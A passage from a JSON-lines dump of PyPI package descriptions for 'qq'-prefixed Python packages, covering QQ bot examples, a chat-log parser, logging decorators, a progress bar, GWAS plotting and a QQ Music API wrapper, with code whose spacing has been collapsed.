\u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590dasync\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_ark.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590dark\u6d88\u606f\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_embed.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590dembed\u6d88\u606f\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_command.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u4f7f\u7528Command\u6307\u4ee4\u88c5\u9970\u5668\u56de\u590d\u6d88\u606f\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_file_data.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590d\u672c\u5730\u56fe\u7247\u6d88\u606f\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_keyboard.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590dmd\u5e26\u5185\u5d4c\u952e\u76d8\u7684\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_markdown.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590dmd\u6d88\u606f\u793a\u4f8b\n\u251c\u2500\u2500 demo_at_reply_reference.py # \u673a\u5668\u4ebaat\u88ab\u52a8\u56de\u590d\u6d88\u606f\u5f15\u7528\u793a\u4f8b\n\u251c\u2500\u2500 demo_dms_reply.py # \u673a\u5668\u4eba\u79c1\u4fe1\u88ab\u52a8\u56de\u590d\u793a\u4f8b\n\u251c\u2500\u2500 demo_get_reaction_users.py # \u673a\u5668\u4eba\u83b7\u53d6\u8868\u60c5\u8868\u6001\u6210\u5458\u5217\u8868\u793a\u4f8b\n\u251c\u2500\u2500 demo_guild_member_event.py # \u673a\u5668\u4eba\u9891\u9053\u6210\u5458\u53d8\u5316\u4e8b\u4ef6\u793a\u4f8b\n\u251c\u2500\u2500 demo_interaction.py # \u673a\u5668\u4eba\u4e92\u52a8\u4e8b\u4ef6\u793a\u4f8b\uff08\u672a\u542f\u7528\uff09\n\u251c\u2500\u2500 demo_pins_message.py # \u673a\u5668\u4eba\u6d88\u606f\u7f6e\u9876\u793a\u4f8b\n\u251c\u2500\u2500 demo_recall.py # \u673a\u5668\u4eba\u6d88\u606f\u64a4\u56de\u793a\u4f8b\n\u251c\u2500\u2500 demo_schedule.py # \u673a\u5668\u4eba\u65e5\u7a0b\u76f8\u5173\u793a\u4f8b\u66f4\u591a\u529f\u80fd\u66f4\u591a\u529f\u80fd\u8bf7\u53c2\u8003: [https://github.com/tencent-connect/botpy]"} +{"package": "qq-chat-history", "pacakge-description": "QQ \u804a\u5929\u8bb0\u5f55\u63d0\u53d6\u5668\u7b80\u4ecb\u4ece QQ \u804a\u5929\u8bb0\u5f55\u6587\u4ef6\u4e2d\u63d0\u53d6\u804a\u5929\u4fe1\u606f\uff0c\u4ec5\u652f\u6301txt\u683c\u5f0f\u7684\u804a\u5929\u8bb0\u5f55\u3002\u5b89\u88c5\u4f7f\u7528pip\u5b89\u88c5\uff0c\u8981\u6c42Python 3.9\u6216\u4ee5\u4e0a\u7248\u672c\u3002>pipinstall-Uqq-chat-history\u4f7f\u7528\u6700\u7b80\u5355\u7684\u542f\u52a8\u65b9\u5f0f\u5982\u4e0b\uff0c\u5b83\u4f1a\u81ea\u52a8\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u521b\u5efaoutput.json\u8fdb\u884c\u8f93\u51fa\uff08\u5982\u679c\u5b89\u88c5\u5230\u865a\u62df\u73af\u5883\u8bf7\u786e\u4fdd\u5df2\u6fc0\u6d3b\uff09\u3002>qq-chat-history/path/to/file.txt\u542f\u52a8\u65f6\u8f93\u5165--help\u53c2\u6570\u67e5\u770b\u66f4\u591a\u914d\u7f6e\u9879\u3002>qq-chat-history--help\u6216\u8005\uff0c\u53ef\u4ee5\u4f5c\u4e3a\u4e00\u4e2a\u7b2c\u4e09\u65b9\u5e93\u4f7f\u7528\uff0c\u5982\u4e0b\uff1aimportqq_chat_historylines='''=========\u5047\u88c5\u6211\u662f QQ \u81ea\u52a8\u751f\u6210\u7684\u6587\u4ef6\u5934=========1883-03-07 11:22:33 AText A1Text A21883-03-07 12:34:56 B(123123)Text B1883-03-07 13:24:36 C(456456)Text C1883-03-07 22:00:51 AText D'''.strip().splitlines()# \u8fd9\u91cc\u7684 lines \u4e5f\u53ef\u4ee5\u662f\u6587\u4ef6\u5bf9\u8c61\u6216\u8005\u4ee5\u5b57\u7b26\u4e32\u6216\u8005 Path \u5bf9\u8c61\u8868\u793a\u7684\u6587\u4ef6\u8def\u5f84\u3002formsginqq_chat_history.parse(lines):print(msg.date,msg.id,msg.name,msg.content)\u6ce8\u610fparse\u65b9\u6cd5\u8fd4\u56de\u7684\u662f\u4e00\u4e2aBody\u5bf9\u8c61\uff0c\u4e00\u822c\u4ee5Iterable[Message]\u7684\u5f62\u5f0f\u4f7f\u7528\u3002\u5f53\u7136Body\u4e5f\u63d0\u4f9b\u4e86\u51e0\u4e2a\u51fd\u6570\uff0c\u867d\u7136\u4e00\u822c\u4e5f\u6ca1\u4ec0\u4e48\u7528\u3002Tips\u5982\u679c\u5f53\u4f5c\u4e00\u4e2a\u7b2c\u4e09\u65b9\u5e93\u6765\u7528\uff0c\u4f8b\u5982find_xxx\u65b9\u6cd5\uff0c\u53ef\u4ee5\u4ece\u6570\u636e\u4e2d\u67e5\u627e\u6307\u5b9aid\u6216name\u7684\u6d88\u606f\uff1bsave\u65b9\u6cd5\u53ef\u4ee5\u5c06\u6570\u636e\u4ee5yaml\u6216json\u683c\u5f0f\u4fdd\u5b58\u5230\u6587\u4ef6\u4e2d\uff0c\u867d\u7136\u8fd9\u4e2a\u5de5\u4f5c\u4e00\u822c\u90fd\u76f4\u63a5\u4ee5CLI\u6a21\u5f0f\u542f\u52a8\u6765\u5b8c\u6210\u3002\u51fd\u6570parse\u53ef\u4ee5\u5904\u7406\u591a\u6837\u7684\u7c7b\u578b\u3002Iterable[str]\uff1a\u8fed\u4ee3\u6bcf\u884c\u7684\u53ef\u8fed\u4ee3\u5bf9\u8c61\uff0c\u5982list\u6216tuple\u7b49\u3002TextIOBase\uff1a\u6587\u672c\u6587\u4ef6\u5bf9\u8c61\uff0c\u5982\u7528open\u6253\u5f00\u7684\u6587\u672c\u6587\u4ef6\uff0c\u6216\u8005io.StringIO\u90fd\u5c5e\u4e8e\u6587\u672c\u6587\u4ef6\u5bf9\u8c61\u3002str,Path\uff1a\u6587\u4ef6\u8def\u5f84\uff0c\u5982./data.txt\u3002\u8fd9\u4e9b\u53c2\u6570\u90fd\u5c06\u4ee5\u5bf9\u5e94\u7684\u65b9\u6cd5\u6765\u6784\u9020Body\u5bf9\u8c61\u3002"} +{"package": "qqddm", "pacakge-description": "QQ's \"Different Dimension Me\" Animefier Python libraryPython wrapper forQQ's \"Different Dimension Me\" AIAPI, that applies an anime-theme to any given picture.InstallingThis package was developed & tested under Python 3.9. Available onPyPI:pipinstall--userqqddmUsageCheck theexamplecode.Known issues and limitations of the APIOnly pictures with human faces: since 2022-12-06, the QQ's API became stricter with the pictures being converted, and requires them to have a human face.Forbidden images: the QQ's API refuses to convert images with sensible or political content.ChangelogVersions 0.y.z are expected to be unstable, and the library API may change on Minor (y) releases.0.1.1Update to the new \"overseas\" API, which can be used from outside ChinaFix how images are downloaded using threads0.0.3Add new custom exceptionParamInvalidQQDDMApiResponseExceptionRefactor mapping of API response codes with custom exceptions, now done programatically, defining the corresponding response code on each exception class0.0.2Add newx-signheaders required by the API since 2022-12-06.Add new custom exceptions based on errors returned by the API:VolumnLimitQQDDMApiResponseException,AuthFailedQQDDMApiResponseException,NotAllowedCountryQQDDMApiResponseException,NoFaceInPictureQQDDMApiResponseException.0.0.1Initial release:Class-based interface.Pass an image (as bytes) and send it to QQ API, returning the resulting images URLs.Download the returned images URLs.Requests settings (different for QQ API and for downloading result images): request timeouts, proxy, user-agents."} +{"package": "qqdm", "pacakge-description": "qqdmA lightweight, fast and pretty progress bar for PythonDemoInstallationpip install qqdmUsageThe following is a simple example.importtimeimportrandomfromqqdmimportqqdm,format_strtw=qqdm(range(10),desc=format_str('bold','Description'))foriintw:loss=random.random()acc=random.random()tw.set_infos({'loss':f'{loss:.4f}','acc':f'{acc:.4f}',})time.sleep(0.5)For the demo gif shown above, you may refer totests/test.py."} +{"package": "qqg", "pacakge-description": "qqgA small CLI search tool.Installationpipx install qqgUsagesearch \"search terms\""} +{"package": "qqhrz", "pacakge-description": "qqhrz\u5bf9\u52a8\u624b\u5b66\u6df1\u5ea6\u5b66\u4e60pytorch\u7248\u7684\u4ee3\u7801\u5b9e\u73b0\u548c\u4e00\u4e9b\u56fe\u795e\u7ecf\u7f51\u7edc\u7684\u4ee3\u7801\u5b9e\u73b01. \u7b80\u4ecb\u8fd9\u4e2a\u5305\u662f\u5bf9\u52a8\u624b\u5b66\u6df1\u5ea6\u5b66\u4e60pytorch\u7248\u7684\u4ee3\u7801\u5b9e\u73b0\u548c\u4e00\u4e9b\u56fe\u795e\u7ecf\u7f51\u7edc\u7684\u4ee3\u7801\u5b9e\u73b0\uff0c\u7531\u672c\u4eba\u4e66\u5199\uff0c\u5b58\u5728\u7740\u8bb8\u591a\u4e0d\u8db3\uff0c\u5e0c\u671b\u5927\u5bb6\u89c1\u8c05\u3002\u5199\u8fd9\u4e2a\u5305\u65e2\u662f\u5bf9\u81ea\u5df1\u7684\u7ec3\u4e60\uff0c\u4e5f\u662f\u5e0c\u671b\u53ef\u4ee5\u7ed9\u540c\u7ec4\u5e08\u5f1f\u3001\u5e08\u59b9\u4eec\u4e00\u4e9b\u5e2e\u52a9\u30022. \u5305\u7684\u7ed3\u6784qqhrz\u5305\u4e2d\u5305\u542b\u4e24\u4e2a\u6a21\u5757\uff1aztorch\u548czgnn2.1 ztorch\u6df1\u5ea6\u5b66\u4e60pytorch\u7248\u7684\u4ee3\u7801\u5b9e\u73b0\u3002\u53ef\u4ee5\u901a\u8fc7\u201dfrom qqhrz import ztorch as qz\u201c\u8fdb\u884c\u8c03\u7528\u30022.2 zgnn\u5bf9\u4e00\u4e9b\u56fe\u795e\u7ecf\u7f51\u7edc\u7684\u4ee3\u7801\u5b9e\u73b0\u3002\u53ef\u4ee5\u901a\u8fc7\u201dfrom qqhrz import zgnn as zg\u201c\u8fdb\u884c\u8c03\u7528\u30023. \u4f9d\u8d56\u4f7f\u7528\u672c\u5305\u65f6\uff0c\u9700\u8981\u5148\u5b89\u88c5pytorch==1.12.0\u548ctorchvision==0.13.0\uff0ccpu\u7248\u548cgpu\u7248\u5747\u53ef\uff0c\u5efa\u8bae\u5b89\u88c5gpu\u7248\u672c\u30024. \u7248\u672c\u66f4\u65b00.0.7\uff1a\u52a0\u5165Transformer\u6a21\u578b\u548cBERT\u6a21\u578b\u4ee5\u53caBERT\u6a21\u5f0f\u8f93\u5165\u6570\u636e\u7684\u5904\u7406\u30020.0.8\uff1a\u89e3\u51b3\u4e86\u8fd0\u884c\u901f\u5ea6\u6162\u7684\u95ee\u9898\uff0c\u539f\u56e0\u662f\u5176\u4e2d\u6709\u4e9b\u5f20\u91cf\u662f\u5728cpu\u4e0a\u7684\uff0c\u5bfc\u81f4\u5728cpu\u4e0a\u8ba1\u7b97\uff0c\u901f\u5ea6\u6162\u30020.1.0\uff1a\u52a0\u5165zgnn\u6a21\u5757\uff0c\u5305\u542b\u5bf9\u4e00\u4e9b\u56fe\u795e\u7ecf\u7f51\u7edc\u7684\u5b9e\u73b0\u30020.1.1\uff1a\u52a0\u5165GCN\u30020.1.2\uff1a\u52a0\u5165GraphSAGE\u30020.1.3\uff1a\u7ed9Transformer\u7f16\u7801\u5668\u548c\u89e3\u7801\u5668\u589e\u52a0max_len\u53c2\u6570\uff0c\u5373\u5e8f\u5217\u6700\u5927\u957f\u5ea6\u30020.1.4: \u52a0\u5165\u8bcd\u8868\uff0c\u4fee\u590d\u4e00\u4e9b\u95ee\u9898\u30020.1.5: \u4fee\u590d\u4e86\u4e00\u4e9b\u95ee\u9898\u30020.1.6: \u4fee\u590d\u4e86\u751f\u6210bert\u8f93\u5165\u6570\u636e\u4e2d\u5b58\u5728\u7684\u4e00\u4e9b\u95ee\u9898\u30020.1.7: \u4fee\u590d\u4e86\u751f\u6210bert\u8f93\u5165\u6570\u636esegment\u4e2d\u5b58\u5728\u7684\u4e00\u4e9b\u95ee\u9898\u30025. \u5e0c\u7ffc\u5e0c\u671b\u81ea\u5df1\u80fd\u591f\u4e0d\u65ad\u5b8c\u5584\uff0c\u4e0d\u65ad\u6539\u8fdb\u4ee3\u7801\uff0c\u63d0\u5347\u81ea\u5df1\u7684\u80fd\u529b\uff0c\u7ed9\u5927\u5bb6\u4e00\u4e9b\u5e2e\u52a9\u3002"} +{"package": "qqhr-z-torch", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qqlib", "pacakge-description": "QQ library for Python, based on web APIs."} +{"package": "qqlog", "pacakge-description": "qqlog installpipinstallqqlogqqlog example 1fromqqlogimportex,init,enterleave,traceinit()#init(path='./log/qqlog.log',level=logging.DEBUG)@ex()deftest1(a,b):returna/b@enterleave()deftest2(a,b):returna/b@trace()deftest3(a,b):returna/b@enterleave()deftest4(a,b,prefix='answer is'):val=a/bprint('%s%s'%(prefix,str(val)))returnvalclasstestclass(object):@enterleave()def__init__(self):print('init')@enterleave()defsum(self,a,b):returna+bimportpandasaspddf=pd.DataFrame(data={'1':[1,2,3],'b':['test1','test2','test3']},index=range(3))@enterleave()defdf_test(a,b,df):val=a+b+df['1'].sum()returnvalimportnumpyasnpd=np.array([[1,2,3],[4,5,6]])@enterleave()defnp_test(a,b,d):val=a+b+d.sum()returnvalimportlogginglogging.getLogger('newlogger')@enterleave(loggername='newlogger',level=logging.ERROR)defnew_logger_test(a,b):returna+btry:test1(1,0)test2(1,1)test3(1,0)test4(1,2,prefix='result:')df_test(1,2,df)np_test(1,2,d)testclass().sum(10,20)new_logger_test(5,15)exceptExceptionasex:print(ex)Console/qqlog.log2021-09-29 21:47:47 [ERROR] [MainThread] [RAISE]test1: division by zero2021-09-29 21:47:47 [DEBUG] [MainThread] [ENTER]test2(0:int=1, 1:int=1)2021-09-29 21:47:47 [DEBUG] [MainThread] [RETURN]test2(1.0)2021-09-29 21:47:47 [ERROR] [MainThread] [RAISE]test3TRACE STARTTraceback (most recent call last):File \"E:\\jupyter\\projects\\whl\\qqlog\\qqlog_init_.py\", line 174, in func_warpreturn_val = func(*args, **kwargs)File \"E:\\jupyter\\projects\\whl\\qqlog\\example.py\", line 15, in test3return a/bZeroDivisionError: division by zeroTRACE END2021-09-29 21:47:47 [DEBUG] [MainThread] [ENTER]test4(0:int=1, 1:int=2, prefix:str='result:')result: 0.52021-09-29 21:47:47 [DEBUG] [MainThread] [RETURN]test4(0.5)2021-09-29 21:47:47 [DEBUG] [MainThread] [ENTER]df_test(0:int=1, 1:int=2, 2:DataFrame=[3bb56549-ebe7-4a85-900f-50d8788d29d3.csv])\n2021-09-29 21:47:47 [DEBUG] [MainThread] [RETURN]df_test(9)2021-09-29 21:47:47 [DEBUG] [MainThread] [ENTER]np_test(0:int=1, 1:int=2, 2:ndarray=[367eb5ed-73f8-45e8-8fcb-4d8781afc46a.ary])2021-09-29 21:47:47 [DEBUG] [MainThread] [RETURN]np_test(24)2021-09-29 21:47:47 [DEBUG] [MainThread] [ENTER]init()init2021-09-29 21:47:47 [DEBUG] [MainThread] [RETURN]init(None)2021-09-29 21:47:47 [DEBUG] [MainThread] [ENTER]sum(0:int=10, 1:int=20)2021-09-29 21:47:47 [DEBUG] [MainThread] [RETURN]sum(30)[ENTER]new_logger_test(0:int=5, 1:int=15)[RETURN]new_logger_test(20)# qqlog example 2\n```python\nfrom qqlog import ex,init,createCsvFileLogger,createConsoleFileLogger\nimport logging\ninit()\n\ncreateCsvFileLogger('csv',level=logging.DEBUG,headers=['asctime','funcName','levelname','msg'],formatters=['asctime','funcName','levelname','msg'],path='debug.csv')\ncreateConsoleFileLogger('consolefile',level=logging.DEBUG,path='./consolefile.log')\n\n@ex(loggername='csv',rethrow=False)\ndef test_csv(a,b):\n return a/b\n\n@ex(loggername='consolefile',rethrow=False)\ndef test_consolefile(a,b):\n return a/b\n\ntry:\n test_csv(1,0)\n test_consolefile(1,0)\nexcept Exception as ex:\n print(ex)asctime,funcName,levelname,msg\n\"2021-10-23 21:32:26\",\"func_warp\",\"ERROR\",\"[RAISE]test_csv: division by zero\"2021-10-23 21:32:26,407 [RAISE]test_consolefile: division by zero"} +{"package": "qqmail", "pacakge-description": "No description available on PyPI."} +{"package": "qq-mail", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qqman", "pacakge-description": "qqman for PythonIf you want to check out the source code or have any issues please leave a comment at mygithubrepository.This library is inspired by r-qqman (seehere).It also contains/will contain other methods for python users.ContentsIntroduction1.1.Installation1.2.Requirements1.3.FeaturesManhattan Plot2.1.Parameters2.2.ExamplesQQ Plot3.1.Parameters3.2.Examples1. Introduction1.1. InstallationUsing pip$pipinstallqqman1.2. Requirementsmatplotlibpandasnumpypip$pipinstallnumpy$pipinstallpandas$pipinstallmatplotlibananconda$condainstall-canacondanumpy$condainstall-y-canacondapandas$condainstall-y-cconda-forgematplotlib1.3. FeaturesManhattan PlotQQ Plot2. Manhattan PlotDraws Manhattan plot from PLINK --assoc output or any assoc formatted data that contains [chromosome/basepair/p-value] as columns.2.1. Parametersassoc: string or pandas.DataFrame- Input file path and name of the Plink assoc output.- Pandas DataFrame with columns [chromosome/basepair/p-value]out: string( optional )Output path and file name of the plot. (ie. out=\"./Manhattan.png\")cmap: Colormap( optional : default=Greys_r )A Colormap instance or registered colormap name. matplotlib.cm.get_cmap()cmap_var: int or list( optional : default=2 )int : Number of colors to uselist : Specific colors to use in colormapshow: bool( optional )If true, the plot will be shown on your screen. (This option doesn't work in CUI environment.)gap: float( optional : default=10)A size of gaps between the group of scatter markers of each chromosome in Manhattan plotax: subplot( optional )If given, this subplot is used to plot in instead of a new figure being created.title: string( optional )A title of the plot.title_size: int( optional )A size of the title of the plot.label_size: int( optional )A size of x and y labels of the plot.xtick_size: int( optional )A size of xtick labels.ytick_size: int( optional )A size of ytick labels.xrotation: float( optional )A rotation degree of xtick labels.yrotation: float( optional )A rotation degree of ytick labels.col_chr: string( optional : default=\"CHR\" )A string denoting the column name for the chromosome. Defaults to PLINK\u2019s \"CHR\" Said column must be numeric.If you have X, Y, or MT chromosomes, be sure to renumber these 23, 24, 25, etc.col_bp: string( optional : default=\"BP\" )A string denoting the column name for the chromosomal position. Defaults to PLINK\u2019s \"BP\" Said column must be numeric.col_p: string( optional : default=\"P\" )A string denoting the column name for the p-value. Defaults to PLINK\u2019s \"P\" Said column must be numeric.col_snp: string( optional : default=\"SNP\" )A string denoting the column name for the SNP name (rs number). Defaults to PLINK\u2019s \"SNP\" Said column should be a charactersuggestiveline: string( optional : default=-log_10(1e-5) )Where to draw a \"suggestive\" line. Set to False to disable.genomewideline: string( optional : default=-log_10(5e-8) )Where to draw a \"genome-wide sigificant\" line. Set to False to disable.2.2. Examples2.2.1. Simplefromqqmanimportqqmanif__name__==\"__main__\":qqman.manhattan(\"../../temp.assoc\",out=\"./Manhattan.png\")2.2.2. Using Subplotfromqqmanimportqqmanimportpandasaspdimportmatplotlib.pyplotaspltif__name__==\"__main__\":df_assoc=pd.read_csv(\"../../temp.assoc\",header=0,delim_whitespace=True)figure,axes=plt.subplots(nrows=2,ncols=2,figsize=(20,20))qqman.manhattan(\"../../temp.assoc\",ax=axes[0,0],title=\"Wider gap 100\",gap=100)qqman.manhattan(\"../../temp.assoc\",ax=axes[0,1],title=\"No lines\",suggestiveline=False,genomewideline=False)qqman.manhattan(\"../../temp.assoc\",ax=axes[1,0],title=\"Different colormap\",cmap=plt.get_cmap(\"jet\"),cmap_var=10)qqman.manhattan(df_assoc,ax=axes[1,1],title=\"From DataFrame with xtick rotation\",xrotation=45)figure.tight_layout()plt.savefig(\"./manhattan.png\",format=\"png\")plt.clf()plt.close()3. QQ PlotDraws a quantile-quantile plot from p-values of GWAS.3.1. Parametersassoctypes: [string, pandas.DataFrame, numpy.array, list]- Input file path and name of the Plink assoc output.- Pandas DataFrame with columns [chromosome/basepair/p-value]out: string( optional )Output path and file name of the plot. (ie. out=\"./Manhattan.png\")show: bool( optional )If true, the plot will be shown on your screen. (This option doesn't work in CUI environment.)ax: subplot( optional )If given, this subplot is used to plot in instead of a new figure being created.title: string( optional )A title of the plot.title_size: int( optional )A size of the title of the plot.label_size: int( optional )A size of x and y labels of the plot.xtick_size: int( optional )A size of xtick labels.ytick_size: int( optional )A size of ytick labels.xrotation: float( optional )A rotation degree of xtick labels.yrotation: float( optional )A rotation degree of ytick labels.col_p: string( optional : default=\"P\" )A string denoting the column name for the p-value. Defaults to PLINK\u2019s \"P\" Said column must be numeric.3.2. Examples3.2.1. Simplefromqqmanimportqqmanif__name__==\"__main__\":qqman.qqplot(\"../../temp.assoc\",out=\"./QQplot.png\")3.2.2. Using Subplotfromqqmanimportqqmanimportpandasaspdimportmatplotlib.pyplotaspltif__name__==\"__main__\":df_assoc=pd.read_csv(\"../../temp.assoc\",header=0,delim_whitespace=True)p_vals=list(df_assoc['P'])figure,axes=plt.subplots(nrows=2,ncols=2,figsize=(20,20))qqman.qqplot(\"../../temp.assoc\",ax=axes[0,0],title=\"From file\")qqman.qqplot(p_vals,ax=axes[0,1],title=\"From list\")qqman.qqplot(df_assoc.P,ax=axes[1,0],title=\"From Series\")qqman.qqplot(df_assoc,ax=axes[1,1],title=\"From DataFrame\")figure.tight_layout()plt.savefig(\"./SubQQplot.png\",format=\"png\")plt.clf()plt.close()"} +{"package": "qqmusic-api", "pacakge-description": "QQMusicAPI\u652f\u6301\u7684\u7248\u672c\u672c\u9879\u76ee\u4f7f\u7528 python 3.6.7 \u8fdb\u884c\u5f00\u53d1\uff0c\u4ec5\u4fdd\u8bc1\u5728\u8be5\u7248\u672c\u4e0a\u53ef\u4ee5\u8fd0\u884c\u3002\u4ee5\u4e0b\u662f\u7ecf\u6d4b\u8bd5\u4e5f\u53ef\u4ee5\u4f7f\u7528\u7684\u7248\u672c\uff08\u4f46\u4e0d\u4fdd\u8bc1\u6240\u6709\u529f\u80fd\u6b63\u5e38\u53ef\u7528\uff09\uff1apython 2.6+python 3.5+\u6ce8\u610f\uff1a\u56e0\u4e3a\u5bf9\u5b57\u7b26\u4e32\u7684\u5904\u7406\u65b9\u5f0f\u4e0d\u540c\uff0c\u5728 Python2 \u4e2d\uff0c\u6240\u6709\u7c7b\u7684__repr__\u65b9\u6cd5\u4e0e__str__\u65b9\u6cd5\u5c06\u4e0d\u53ef\u7528\u3002\u652f\u6301\u7684\u5e73\u53f0\u672c\u9879\u76ee\u4f7f\u7528 Ubuntu 18.04 \u8fdb\u884c\u5f00\u53d1\uff0c\u4ec5\u4fdd\u8bc1\u5728\u8be5\u5e73\u53f0\u4e0a\u53ef\u7528\u3002\u9879\u76ee\u6ca1\u6709\u5e73\u53f0\u76f8\u5173\u7684\u4f9d\u8d56\uff0c\u7406\u8bba\u4e0a\u53ef\u4ee5\u5728\u4efb\u4f55\u53ef\u4ee5\u4f7f\u7528 Python \u7684\u5e73\u53f0\u4e0a\u8fd0\u884c\u3002UsageSongSearchPager>>>fromQQMusicAPIimportQQMusic>>>music_list=QQMusic.search('\u5c4a\u304b\u306a\u3044\u604b')# \u6211\u6700\u559c\u6b22\u7684\u662f\u5b66\u59d0\u7248\u7684(\u8305\u91ce\u611b\u8863)>>>type(music_list)>>>music_list.data[, , , , , , , , , , , , , ,,,,,,]>>>music_list.page_size2>>>music_list.total_num39>>>music_list.keyword'\u5c4a\u304b\u306a\u3044\u604b'>>>music_list.cursor_page1>>>next_music_list=music_list.next_page()>>>next_music_list.cursor_page2>>>prev_music_list=next_music_list.prev_page()>>>prev_music_list.cursor_page1Song>>>fromQQMusicAPIimportQQMusic>>>music_list=QQMusic.search('\u5c4a\u304b\u306a\u3044\u604b')>>>song=music_list.data[0]>>>type(song)>>>song.song_mid'0044XSxC3rZYir'>>>song.url'https://y.qq.com/n/yqq/song/0044XSxC3rZYir.html'>>>song.name\"\u5c4a\u304b\u306a\u3044\u604b '13\">>>song.title\"\u5c4a\u304b\u306a\u3044\u604b '13 (\u65e0\u6cd5\u4f20\u8fbe\u7684\u7231\u604b'13)\">>>song.singer[]>>>song.song_url()'http://dl.stream.qqmusic.qq.com/C4000044XSxC3rZYir.m4a?vkey=0E9DBFC4D180A631CD62ED0784E3DFA450F3B21148A4A9BD5C8E916B6EFDEF2C7A3EA45067C288890EC1D40F6603C9545FE65E49D53D2BC4&guid=8388983860&fromtag=30'>>>importrequests# \u751f\u6210\u7684\u94fe\u63a5\u53ef\u4ee5\u4f7f\u7528 requests \u76f4\u63a5\u4e0b\u8f7d\uff0c\u4e5f\u53ef\u4ee5\u5728\u6d4f\u89c8\u5668\u4e2d\u76f4\u63a5\u6253\u5f00>>>resp=requests.get(song.song_url(),headers={'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'})>>>withopen('music.m4a','wb')asfw:...fw.write(resp.content)...4210605>>>song.subtitle# \u67e5\u8be2\u5230\u7684\u4ec5\u6709\u57fa\u7840\u4fe1\u606f>>>song.extract()# \u83b7\u53d6\u6b4c\u66f2\u7684\u8be6\u7ec6\u4fe1\u606f>>>song.subtitle'\u300a\u767d\u8272\u76f8\u7c3f2\u300bTV\u52a8\u753b\u7b2c1\u96c6\u7247\u5934\u66f2|\u300a\u767d\u8272\u76f8\u7c3f2\u300bTV\u52a8\u753b\u7b2c7-8\u96c6\u7247\u5934\u66f2|\u300a\u767d\u8272\u76f8\u7c3f2\u300bTV\u52a8\u753b\u7b2c10-12\u96c6\u7247\u5934\u66f2'>>>song.transname\"\u65e0\u6cd5\u4f20\u8fbe\u7684\u7231\u604b'13\">>>song.extras_name\"\u5c4a\u304b\u306a\u3044\u604b '13\"Lyric>>>fromQQMusicAPIimportQQMusic>>>music_list=QQMusic.search('\u5c4a\u304b\u306a\u3044\u604b')>>>song=music_list.data[0]>>>lyric=song.lyric>>>type(lyric)>>>lyric.extract()>>>lyric.lyric\"[ti:\u5c4a\u304b\u306a\u3044\u604b '13(TV\u30a2\u30cb\u30e1\u300cWHITE ALBUM2\u300dOP)]\\n[ar:\u4e0a\u539f\u308c\u306a]\\n[al:TV\u30a2\u30cb\u30e1\u300cWHITE ALBUM2\u300dOP\u30c6\u30fc\u30de\u300c\u5c4a\u304b\u306a\u3044\u604b\u201913\u300d]\\n[by:]\\n[offset:0]\\n[00:00.01]\u5c4a\u304b\u306a\u3044\u604b '13 (\u65e0\u6cd5\u4f20\u8fbe\u7684\u7231\u604b'13) (\u300a\u767d\u8272\u76f8\u7c3f2\u300bTV\u52a8\u753b\u7b2c1\u96c6\u7247\u5934\u66f2|\u300a\u767d\u8272\u76f8\u7c3f2\u300bTV\u52a8\u753b\u7b2c7-8\u96c6\u7247\u5934\u66f2|\u300a\u767d\u8272\u76f8\u7c3f2\u300bTV\u52a8\u753b\u7b2c10-12\u96c6\u7247\u5934\u66f2) - \u4e0a\u539f\u308c\u306a (\u4e0a\u539f\u73b2\u5948)\\n[00:00.02]\u4f5c\u8a5e\uff1a\u9808\u8c37\u5c1a\u5b50\\n[00:00.03]\u4f5c\u66f2\uff1a\u77f3\u5ddd\u771f\u4e5f\\n\\n[00:00.04]\\n[00:25.10]\u5b64\u72ec\u306a\u3075\u308a\u3092\u3057\u3066\u308b\u306e?\\n[00:31.72]\u306a\u305c\u3060\u308d\u3046 \u6c17\u306b\u306a\u3063\u3066\u3044\u305f\\n[00:38.15]\u6c17\u3065\u3051\u3070 \u3044\u3064\u306e\u307e\u306b\u304b\\n[00:45.76]\u8ab0\u3088\u308a \u60f9\u304b\u308c\u3066\u3044\u305f\\n[00:54.06]\u3069\u3046\u3059\u308c\u3070 \u3053\u306e\u5fc3\u306f \u93e1\u306b\u6620\u308b\u306e?\\n[01:08.47]\u5c4a\u304b\u306a\u3044\u604b\u3092\u3057\u3066\u3044\u3066\u3082\\n[01:15.21]\u6620\u3057\u3060\u3059\u65e5\u304c\u304f\u308b\u304b\u306a\\n[01:21.45]\u307c\u3084\u3051\u305f\u7b54\u3048\u304c \u898b\u3048\u59cb\u3081\u308b\u307e\u3067\u306f\\n[01:29.38]\u4eca\u3082\u3053\u306e\u604b\u306f \u52d5\u304d\u51fa\u305b\u306a\u3044\\n[01:40.77]\\n[01:57.05]\u521d\u3081\u3066\u58f0\u3092\u304b\u3051\u305f\u3089\\n[02:04.23]\u632f\u308a\u5411\u3044\u3066\u304f\u308c\u305f\u3042\u306e\u65e5\\n[02:11.28]\u3042\u306a\u305f\u306f \u7729\u3057\u3059\u304e\u3066\\n[02:18.08]\u307e\u3063\u3059\u3050\u898b\u308c\u306a\u304b\u3063\u305f\\n[02:25.82]\u3069\u3046\u3059\u308c\u3070 \u305d\u306e\u5fc3\u306b \u79c1\u3092\u5199\u3059\u306e?\\n[02:37.67]\\n[02:40.30]\u53f6\u308f\u306a\u3044\u604b\u3092\u3057\u3066\u3044\u3066\u3082\\n[02:47.66]\u5199\u3057\u3060\u3059\u65e5\u304c\u304f\u308b\u304b\u306a\\n[02:53.84]\u307c\u3084\u3051\u305f\u7b54\u3048\u304c \u5c11\u3057\u3067\u3082\u898b\u3048\u305f\u3089\\n[03:02.26]\u304d\u3063\u3068\u3053\u306e\u604b\u306f 